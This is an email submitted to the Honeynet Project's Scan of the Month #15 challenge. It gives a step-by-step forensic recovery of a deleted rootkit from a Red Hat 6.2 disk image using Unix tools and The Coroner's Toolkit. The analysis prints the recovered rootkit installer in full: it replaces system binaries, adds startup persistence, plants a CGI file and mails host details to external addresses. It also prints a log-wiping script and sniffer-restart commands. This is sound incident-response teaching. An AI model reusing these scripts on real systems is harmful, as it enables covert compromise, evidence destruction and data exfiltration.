From malmassari@hotmail.com Fri May 25 11:48:45 2001 Date: Fri, 25 May 2001 08:02:46 From: Majid Almassari To: project@honeynet.org Subject: Scan#15 The challenge: 1.Show step by step how you identify and recover the deleted root kit from the / partition. 2.Recover the root kit. Identify what files make up the deleted root kit? Bonus Question: Was the root kit ever actually installed on the system? How do you know? ---------------------------------------------------------------- Recovery: 1.Download the compressed image of the root slice /. Verify the MD5 checksum, In my system I have GNU Privacy Guard (GPG) installed which I'm going to use for MD5 verification: gpg --print-md md5 honeynet.tar.gz honeynet.tar.gz: 0D FF 8F B9 FE 02 2E A8 0D 8F 1A 4E 4A E3 3E 21 Which checks out with MD5=0dff8fb9fe022ea80d8f1a4e4ae33e21. This does not necessarily mean that the tar ball is authentic, one can use tools such as "fix" to counter fit the checksum. For our purpose we will go a head and trust the results! untaring the file tar xzvf honeynet.tar.gz and verifying the signature again we get gpg --print-md md5 honeypot.hda8.dd honeypot.hda8.dd: 5A 8E BF 57 25 B1 5E 56 3C 82 5B E8 5F 2F 85 2E Which checks out with MD5=5a8ebf5725b15e563c825be85f2f852e. Note that I could of used another utility such as md5sum. Use man md5sum for more information. Reading the Readme file, we have: (1) The system is a Linux Red Hat 6.2. (2) The root slice was included /dev/hda8. 2.The image files can be mounted on Linux systems using the loopback interface like this: # mkdir /home/t # mount -o ro,loop,nodev,noexec honeypot.hda8.dd /home/t Note that it is a good idea to mount read-only to preserve evidence and noexec, nodev to avoid executing a binary in the mounted partition and ignore any device it might encounter. 3.Before starting to analyze any files, we need to establish our forensic tool kit. One of the methods is to burn a CD-ROM copy of well known source files of various file and network utilities such as netstat, lsof, ps, ls, su, gdb, passwd, netcat, strace/ltrace, who, finger, w, find and many others including static system and shared libraries. This technique is essential and provide a base of trusted utilities when analyzing files on a system that is being compromised with a root kit. Since we are analyzing a backed-up bit "dd" image of the compromised root partition on a separate analysis system, this step is not required but recommended. I will go ahead and trust the binaries on the analysis system which I'm going to use the following Methods for Analysis: (1)Standard UNIX tools to perform the analysis. Its amazing how much info you can get out of the standard unix commands like strings and grep. (2)The Coroner Tool Kit. I will use various utilities from TCT like icat, unrm and lazarous. It is also recommended that we perform the analysis in a trusted similar OS system release; for this scan, the analysis system is a VA Linux box running Red Hat 6.2. Also I will be using the Coroner's Tool Kit to perform forensics analysis. Analyzing using standard UNIX Tools: 1. I used script to record my bash shell terminal session and issued the following commands: 2. less /home/t/etc/fstab to get the file system structure. 3. ls -lat /home/t/home. Surprisingly there were no directories. 4. less /home/t/etc/passwd. Accounts looked normal but the account jjs:x:500:500:John J. Smith:/home/jss:/bin/bash has a home directory of /home/jss which is not apparent in step 3 above. 5. ls -lat /dev | head -50 gives listing of suspicious files that start with - (normal files in device directory! Hmm) the file names are last, rpm and MAKEDEV with an execute permissions. An ida and an rd directories. 6. less /home/t/dev/last gives: 1 193.231.139 1 213.154.137 1 193.254.34 3 48744 3 3666 3 31221 3 22546 4 48744 4 2222 7. less /home/t/dev/rpm gives: 3 sl2 3 sshdu 3 linsniffer 3 smurf 3 slice 3 mech 3 muh 3 bnc 3 psybnc Interesting, sshdu is a trojaned ssh daemon, linsniffer is just a sniffer. smurf, slice, sl2 (Slice2) are DoS Programs, bnc and psybnc are probably a trojaned version of ps command watch for an executable name of bnc and psybnc 8. # strings /home/t/dev/MAKEDEV > strings.out less strings.out shows a long script that is part of a trojan rewriting the /proc and /dev file system. 9. Since we are working on a trusted analysis system, we can safely use commands such as find and grep. Nothing of interest was found, it looks like there were some files and/or folders deleted from the system, for example there is nothing in the home and usr/bin directories. Even though the account jjs should have a home directory. This is where I'm going to use the Coroner's Tool Kit. See the next section for details. The Coroner's ToolKit (TCT): 1.Copied the password and group files to the main tct-1.6 directory for further analysis, renamed the passwd and group file to victim.passwd and victim.group respectively. 2.Used grave-robber to collect lstat() results for mactime. 3.Used "ils" and " ils2mac" to get the MAC of deleted i-nodes. 4.Combined the body of undeleted and deleted i-nodes and named it complete-body. 5.Ran mactime to get Modify/Access/Change MAC timestamp analysis. ---------------------------------------------------------------- #grave-robber -c /home/t -m -d data -o LINUX2 #ils /home/malmassari/HoneyNet/scan15/honeynet/honeypot.hda8.dd | ils2mac > body-deleted #cat body body-deleted > body-full #mactime -p victim.passwd -g victim.group -b body-full 3/14/2001 > mactime.txt ---------------------------------------------------------------- now we have mactime.txt file we can grep for various keywords like rpm, sl2, linsniffer, smurf, slice, mesh, muh, bnc, psybnc, and jjs. Interesting results where obtained for sl2 and linsniffer in /home/t/dev/ida which implies further investigation. ---------------------------------------------------------------- # grep rpm mactime.txt Mar 15 01 03:18:15 886424 ..c -rwxr-xr-x root root /home/t/bin/rpm Mar 15 01 03:18:16 1024 ..c drwxr-xr-x root root /home/t/etc/rpm 886424 .a. -rwxr-xr-x root root /home/t/bin/rpm 71 mac -rw-r--r-- root root /home/t/dev/rpm 1024 .a. drwxr-xr-x root root /home/t/etc/rpm # grep sl2 mactime.txt 8268 mac -rwx------ root root /home/t/dev/ida/.. /sl2 8268 mac -rwx------ root root /home/t/dev/ida/.drag-on/sl2A # grep linsniffer mactime.txt 7165 mac -rwx------ root root /home/t/dev/ida/.. /linsniffer 7165 m.c -rwx------ root root /home/t/dev/ida/.drag-on/linsniffer 7165 .a. -rwx------ root root /home/t/dev/ida/.drag-on/linsniffer # grep smurf mactime.txt # grep slice mactime.txt # grep mesh mactime.txt # grep muh mactime.txt # grep bnc mactime.txt # grep psybnc mactime.txt # grep jjs mactime.txt Mar 15 01 09:31:40 0 ..c crw--w---- jjs tty /home/t/dev/vcs1 0 ..c crw--w---- jjs tty /home/t/dev/vcsa1 doing an ls -lat on /home/t/dev/ida/.drag-on we get: # ls -lat total 660 -rw-r--r-- 1 root root 138 Mar 16 08:28 tcp.log -rw------- 1 root root 512 Mar 16 06:45 ssh_random_seed drwxr-xr-x 2 root root 1024 Mar 15 17:45 . drwxrwxr-x 4 root root 12288 Mar 15 17:45 .. -rwx------ 1 root root 7165 Mar 15 17:45 linsniffer -rwx------ 1 root root 75 Mar 15 17:45 logclear -rwxr-xr-x 1 root root 632066 Mar 15 17:45 mkxfs -rw-r--r-- 1 root root 708 Mar 15 17:45 s -rwxr-xr-x 1 root root 4060 Mar 15 17:45 sense -rwx------ 1 root root 8268 Mar 15 17:45 sl2 -rw------- 1 root root 540 Mar 15 17:45 ssh_host_key interesting results are in tcp.log which appears to be a linsniffer log file. It also appears that an FTP connection from cr272065-a.wlfdle1.on.wave.home.com failed but telnet connection was successful from ns2.giant.net also the famous linux sniffer was stopped by the kill command and then recreated: ---------------------------------------------------------------- #less tcp.log cr272065-a.wlfdle1.on.wave.home.com => asdf1 [21] ----- [Timed Out] ns2.giant.net => asdf1 [23] da#da,~daO~daO~daU~ #'da[~dac~!dan~da~? #less logclear killall -9 linsniffer rm -rf tcp.log touch tcp.log ./linsniffer >tcp.log & ---------------------------------------------------------------- issuing a strings command on mkxfs shows that its just a trojaned version of sshd 1.2.27 trying to get installed, It also looks like they tried to generate their own pair of pulic/private keys. Interesting.. I wonder what happens if the attacker had his hands on an existing public/private keys? Trustrelationship here we come! I also wonder if the trojaned sshd does any logging or if they got a patch for the trojan to accept magic passwords and does not log? ;-) a snippet from strings output is shown below. ---------------------------------------------------------------- /etc/sshd_config Received SIGHUP; restarting. RESTART FAILED: av[0]='%.100s', error: %.100s. Received signal %d; terminating. Timeout before authentication. Generating new %d bit RSA key. RSA key generation complete. f:p:b:k:h:g:diqV: i686-unknown-linux 1.2.27 sshd version %s [%s] Usage: %s [options] Options: /etc -f file Configuration file (default %s/sshd_config) -d Debugging mode -i Started from inetd -q Quiet (no logging) -p port Listen on the specified port (default: 22) -k seconds Regenerate server key every this many seconds (default: 3600) -g seconds Grace period for authentication (default: 300) -b bits Size of server RSA key (default: 768 bits) /etc/ssh_host_key ....... ---------------------------------------------------------------- The "s" file is just the trojaned sshd_config file, the interesting part is that it listens on port 5. The strings output of the sense file indicates that its sorts the output from LinSniffer 0.03 b[BETA] by Mike Edulla . At the moment I can not make the strings output for sl2, it looks like the compilation core dumped. This is interesting and keep it in mind because that might indicate that the root kit was not installed successfully. The strings output of ssh_host_key shows that its a private key belonging to root@dil2.datainfosys.net. ---------------------------------------------------------------- SSH PRIVATE KEY FILE FORMAT 1.1 RLU( root@dil2.datainfosys.neth_h_ 0lj0 ---------------------------------------------------------------- The following files where recovered using icat: #icat /home/malmassari/HoneyNet/scan15/honeynet/honeypot.hda8.dd 16110 > icat-16110 #file icat-16110 icat-16110: ASCII text #cat icat-16110 #%PAM-1.0 auth required /lib/security/pam_pwdb.so shadow nullok account required /lib/security/pam_pwdb.so password required /lib/security/pam_cracklib.so retry=3 password required /lib/security/pam_pwdb.so use_authtok nullok ---------------------------------------------------------------- #icat /home/malmassari/HoneyNet/scan15/honeynet/honeypot.hda8.dd 30188 > icat-30188 #file icat-30188 icat-30188: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped #strings icat-30188 > icat-30188-strings.out <--- Trojaned netstat 1.38, see below +NEW_ADDRT +RTF_IRTT +RTF_REJECT +FW_MASQUERADE +I18N AF: (inet) +UNIX +INET +INET6 +IPX +AX25 +NETROM +ATALK +ECONET +ROSE HW: +ETHER +ARC +SLIP +PPP +TUNNEL +TR +AX25 +NETROM +FR +ROSE +ASH +SIT +FDDI +HIPPI +HDLC/LAPB net-tools 1.54 netstat 1.38 (1999-04-20) Fred Baumgarten, Alan Cox, Bernd Eckenfels, Phil Blundell, Tuan Hoang and others /proc /proc/%s/fd socket:[ cmdline %s/%s (No info could be read for "-p": geteuid()=%d but you should be root.) (Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.) ESTABLISHED DISC SENT CONN SENT LISTENING /proc/net/nr AF NETROM netstat %s: no support for `%s' on this system. Active NET/ROM sockets User Dest Source Device State Vr/Vs Send-Q Recv-Q %s %*x/%*x %*x/%*x %d %d %d %*d %*d/%*d %*d/%*d %*d/%*d %*d/%*d %*d/%*d %*d %d %d %*d Problem reading data from %s %-9s %-9s %-9s %-6s %-11s %03d/%03d %-6d %-6d CLOSING ---------------------------------------------------------------- #icat /home/malmassari/HoneyNet/scan15/honeynet/honeypot.hda8.dd 30191 > icat-30191 #file icat-30191 icat-30191: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped #strings icat-30191 > icat-30191-strings.out <--- Possible Trojaned "ps" since it uses libproc.s0.2.0.6. See below for a strings snipit output /lib/ld-linux.so.2 __gmon_start__ libproc.so.2.0.6 dev_to_tty procps_version Hertz _DYNAMIC ps_readproc reset_sort_options read_total_main open_psdb _init display_version openproc look_up_our_self linux_version_code closeproc uptime _fini wchan _GLOBAL_OFFSET_TABLE_ libc.so.6 ---------------------------------------------------------------- #icat /home/malmassari/HoneyNet/scan15/honeynet/honeypot.hda8.dd 2039 > icat-2039 #file icat-2039 icat-2039: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped #strings icat-2039 > icat-2039-strings.out <--- looks like sshd installation script. /lib/ld-linux.so.2 __gmon_start__ libnsl.so.1 libcrypt.so.1 libutil.so.1 libc.so.6 ............. /usr/bin/rsh /rlogin You don't exist, go away! ssh1 slogin1 ssh.old slogin.old ssh1.old slogin1.old remsh eilcpLRo Warning: Identity file %s does not exist. ............... ---------------------------------------------------------------- You can do this with each dead file listed in mactime.txt, instead I will use the disk data recovery tool that comes with TCT, namely the unrm utility. First you want to determine the disk space needed for the output. Using the df command on the mounted partition shows that we need #df /home/t Filesystem 1k-blocks Used Available Use% Mounted on /home/malmassari/HoneyNet/scan15/honeynet/honeypot.hda8.dd 256667 32498 210917 13% /home/t Therefore we need about 210 MB of free disk space. This should not be a problem since we are analyzing this in a 30 GB Drive. #unrm /home/malmassari/HoneyNet/scan15/honeynet/honeypot.hda8.dd > victim.hda8.unrm It took about 2-3 minutes till the output was generated. It was about 230 MB binary file. Now I will feed the result to lazarus with -h to generate an HTML output #lazarus -h vicitim.hda8.unrm The process lasted for about 20 minutes, there were two subdirectories created "blocks" and "www". Opening victim.hda8.unrm.frame.html with a browser, we can see a hyperlinked output of lazarus with the top frame showing file type designation in a coded color. Browsing through the output files, I found couple of interesting files: ---------------------------------------------------------------- 8499.frame.html: This looks like the root kit installation script, see below ---------------------------------------------------------------- #!/bin/sh clear unset HISTFILE echo "********* Instalarea Rootkitului A Pornit La Drum *********" echo "********* Mircea SUGI PULA ********************************" echo "********* Multumiri La Toti Care M-Au Ajutat **************" echo "********* Lemme Give You A Tip : **************************" echo "********* Ignore everything, call your freedom ************" echo "********* Scream & swear as much as you can ***************" echo "********* Cuz anyway nobody will hear you and no one will *" echo "********* Care about you **********************************" echo echo chown root.root * if [ -f /usr/bin/make ]; then echo "Are Make !" else echo "Nu Are Make !" fi if [ -f /usr/bin/gcc ]; then echo "Are Gcc !" else echo "Nu Are Gcc !" fi if [ -f /usr/sbin/sshd/ ]; then echo "Are Ssh !" else echo "Nu Are Ssh !" fi echo -n "* Inlocuim nestat ... alea alea " rm -rf /sbin/ifconfig mv ifconfig /sbin/ifconfig rm -rf /bin/netstat mv netstat /bin/netstat rm -rf /bin/ps mv ps /bin/ps rm -rf /usr/bin/top mv top /usr/bin/top cp -f mkxfs /usr/sbin/ echo "* Gata..." echo -n "* Dev... " echo echo touch /dev/rpm >/dev/rpm echo "3 sl2" >>/dev/rpm echo "3 sshdu" >>/dev/rpm echo "3 linsniffer" >>/dev/rpm echo "3 smurf" >>/dev/rpm echo "3 slice" >>/dev/rpm echo "3 mech" >>/dev/rpm echo "3 muh" >>/dev/rpm echo "3 bnc" >>/dev/rpm echo "3 psybnc" >> /dev/rpm touch /dev/last >/dev/last echo "1 193.231.139" >>/dev/last echo "1 213.154.137" >>/dev/last echo "1 193.254.34" >>/dev/last echo "3 48744" >>/dev/last echo "3 3666" >>/dev/last echo "3 31221" >>/dev/last echo "3 22546" >>/dev/last echo "4 48744" >>/dev/last echo "4 2222" >>/dev/last echo "* Gata" echo "* Facem Director...Si Mutam Alea.. " mkdir -p /dev/ida/.drag-on mkdir -p /dev/ida/".. " echo "* Copiem ssh si alea" cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/ cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/".. " rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed touch /dev/ida/.drag-on/tcp.log touch /dev/ida/".. "/tcp.log cp -f inetd.conf /etc cp -f services /etc killall -HUP inetd echo echo echo echo "* Adaugam In Startup:) ..." rm -rf /usr/bin/lsattr echo "/usr/bin/lsattr -t1 -X53 -p" >> /etc/rc.d/rc.sysinit echo >> /etc/rc.d/rc.sysinit cp -f lsattr /usr/bin/ chmod 500 /usr/bin/lsattr chattr +i /usr/bin/lsattr /usr/bin/lsattr sleep 1 if [ -d /home/httpd/cgi-bin ] then mv -f last.cgi /home/httpd/cgi-bin/ fi if [ -d /usr/local/httpd/cgi-bin ] then mv -f last.cgi /usr/local/httpd/cgi-bin/ fi if [ -d /usr/local/apache/cgi-bin ] then mv -f last.cgi /usr/local/apache/cgi-bin/ fi if [ -d /www/httpd/cgi-bin ] then mv -f last.cgi /www/httpd/cgi-bin/ fi if [ -d /www/cgi-bin ] then mv -f last.cgi /www/cgi-bin/ fi echo "* Luam Informatiile dorite ..." echo "* Info : $(uname -a)" >> computer echo "* Hostname : $(hostname -f)" >> computer echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> computer echo "* Uptime : $(uptime)" >> computer echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> computer echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> computer echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> computer echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> computer echo "* Spatiu Liber: $(df -h)" >> computer echo "* Gata ! Trimitem Mailul ...Asteapta Te Rog " cat computer | mail -s "placinte" last@linuxmail.org cat computer | mail -s "roote" bidi_damm@yahoo.com echo "* Am trimis mailul ... stergem fisierele care nu mai trebuie ." echo echo echo "* G A T A *" echo echo "* That Was Nice Last " cd / rm -rf last lk.tgz computer lk.tar.gz ---------------------------------------------------------------- The 8510.frame.html file is basically sauber by socked which is part of t0rn kit, namely t0rnsb. Sauber is a German word which mean clean, it cleans syslog files then restart syslogd. See below #!/bin/bash # # sauber - by socked [11.02.99] # # Usage: sauber BLK='#[1;30m' RED='#[1;31m' GRN='#[1;32m' YEL='#[1;33m' BLU='#[1;34m' MAG='#[1;35m' CYN='#[1;36m' WHI='#[1;37m' DRED='#[0;31m' DGRN='#[0;32m' DYEL='#[0;33m' DBLU='#[0;34m' DMAG='#[0;35m' DCYN='#[0;36m' DWHI='#[0;37m' RES='#[0m' echo "${BLK}* ${WHI}sauber ${DWHI}by ${WHI}s${BLU}o${DBLU}ck${BLK}ed [${DWHI}07${BLK}.${DWHI}27${BLK}.${DWHI}97${BLK}]${RES}" if [ $# != 1 ] then echo "${BLK}* ${DWHI}Usage${WHI}: "`basename $0`" <${DWHI}string${WHI}>${RES}" echo " " exit fi echo "${BLK}*${RES}" echo "${BLK}* ${DWHI}Cleaning logs.. This may take a bit depending on the size of the logs.${RES}" WERD=$(/bin/ls -F /var/log | grep -v "/" | grep -v "*" | grep -v ".tgz" | grep -v ".gz" | grep -v ".tar" | grep -v "lastlog" | grep -v "utmp" | grep -v "wtmp" | grep -v "@") for fil in $WERD do line=$(wc -l /var/log/$fil | awk -F ' ' '{print $1}') echo -n "${BLK}* ${DWHI}Cleaning ${WHI}$fil ($line ${DWHI}lines${WHI})${BLK}...${RES}" grep -v $1 /var/log/$fil > new touch -r /var/log/$fil new mv -f new /var/log/$fil newline=$(wc -l /var/log/$fil | awk -F ' ' '{print $1}') let linedel=$(($line-$newline)) echo "${WHI}$linedel ${DWHI}lines removed!${RES}" done killall -HUP syslogd echo "${BLK}* ${DWHI}Alles sauber mein Meister !'Q%&@$! ${RES}" stream tcp nowait cyrus /usr/cyrus/bin/pop3d pop3d --------------------------------------------------------------- 8517.frame.html is a deleted /etc/services file. 8529.frame.html is a Perl script that that sorts linsniff output. 84383.frame.html is an email generated from the root kit installation script. It sends System info to last@linuxmail.org. See below To: last@linuxmail.org Subject: placinte * Info : Linux asdf1 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown * Hostname : asdf1 * IfConfig : inet addr:127.0.0.1 Bcast:127.255.255.255 Mask:255.0.0.0 inet addr:172.16.1.108 Bcast:172.16.1.255 Mask:255.255.255.0 * Uptime : 7:45pm up 8:23, 0 users, load average: 0.00, 0.00, 0.00 * Cpu Vendor ID : vendor_id : GenuineIntel * Cpu Model : model : 4 model name : Pentium MMX * Cpu Speed: cpu MHz : 200.457171 * Bogomips: bogomips : 399.77 * Spatiu Liber: Filesystem Size Used Avail Use% Mounted on /dev/hda8 251M 33M 205M 14% / /dev/hda1 23M 2.4M 19M 11% /boot /dev/hda6 1.6G 2.1M 1.5G 0% /home /dev/hda5 1.6G 367M 1.2G 23% /usr /dev/hda7 251M 5.3M 232M 2% /var ---------------------------------------------------------------- 100152.frame.html is a deleted /etc/nsswitch.conf. 100159.frame.html is a deleted /etc/group. 100169.frame.html is a deleted /etc/passwd. 100219.frame.html is a deleted /etc/inittab. 100265.frame.html is a deleted /etc/syslogd.conf now it is time to recover the deleted binaries, starting with ifconfig: #grep -il ifconfig blocks/* > ifconfig-match # cat ifconfig-match blocks/165802.strings blocks/165802.x.txt blocks/385.x.txt blocks/84383.m.txt blocks/8499.p.txt The 165802.strings is just the strings output when I was investigating the file, this file looks like the original deleted ifconfig. Similarly, #grep -il netstat blocks/* > netstat-match #cat netstat-match blocks/114990.t.txt blocks/114991...txt blocks/114993.t.txt blocks/114994...txt blocks/115001.t.txt blocks/165802.strings blocks/165802.x.txt blocks/30039.t.txt blocks/385.strings blocks/385.x.txt blocks/8043...txt blocks/8394.t.txt blocks/8499.p.txt blocks/8510.t.txt blocks/8517.t.txt blocks/8767...txt blocks/9020.strings blocks/9020.x.txt This is obviously a lot of files to go through, we can look at the original strings output of netstat and grep on a library used like this #strings /bin/netstat > netstat-orig-strings #less netstat-orig-strings ..... netstat 1.38 (1999-04-20) ..... therefore grepping through the block folder yeilds the following: #grep -il "netstat 1.38 (1999-04-20)" blocks/* > netstat-match #cat netstat-match blocks/114990.strings blocks/114990.t.txt blocks/netstat-orig-strings therefore 114990.t.txt represents the deleted netstat. Similarly for the other files ---------------------------------------------------------------- The root kit is consists of the following trojaned files: ifconfig, netstat, ps, top, mkxfs, lsattr. In addition the following files where installed in /home/t/dev/rpm sl2 sshdu linsniffer smurf slice mech muh bnc psybnc The following files where installed in /dev/ida/.drag-on and /dev/ida/".." linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed. This root kit is very similar to the t0rn kit which has binaries compiled with libc5 and does not work properly under Red Hat 6.2 ---------------------------------------------------------------- Bonus Question: The root kit was indeed installed on the system. First, there was that deleted mail shown above confirming the root kit installation. Secondly, there is a tcp.log which shows linsniff activity output. ---------------------------------------------------------------- References: 1.David Dittrich. "Root Kits" and hiding files/directories/processes after a break-in. URL: http://staff.washington.edu/dittrich/misc/faqs/rootkits.faq 2.Eric Cole and Ed Skoudis, Backdoor, Trojans and Rootkits. Part of SANS Advanced Incident Handeling and Hackers Exploit Training. 3.David Dittrich. Responding to a security incident on a Unix workstation. URL: http://staff.washington.edu/dittrich/misc/faqs/responding.faq 4.Laurie Zirkle, John Green, Stephen Northcutt, George Drake, and David Dittrich. Inciden Handeling Step-by-Step: Unix Trojan Programs. Version 2.3. Part of SANS Advanced Incident Handeling and Hackers Exploit Training. 5.David Dittrich. Basic Steps in Forensic Analysis of Unix Systems. URL: http://staff.washington.edu/dittrich/misc/forensics/ 6.Martin Hamilton. Unix Security 101 - forensic examples. URL: http://martinh.net/forensics/ _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com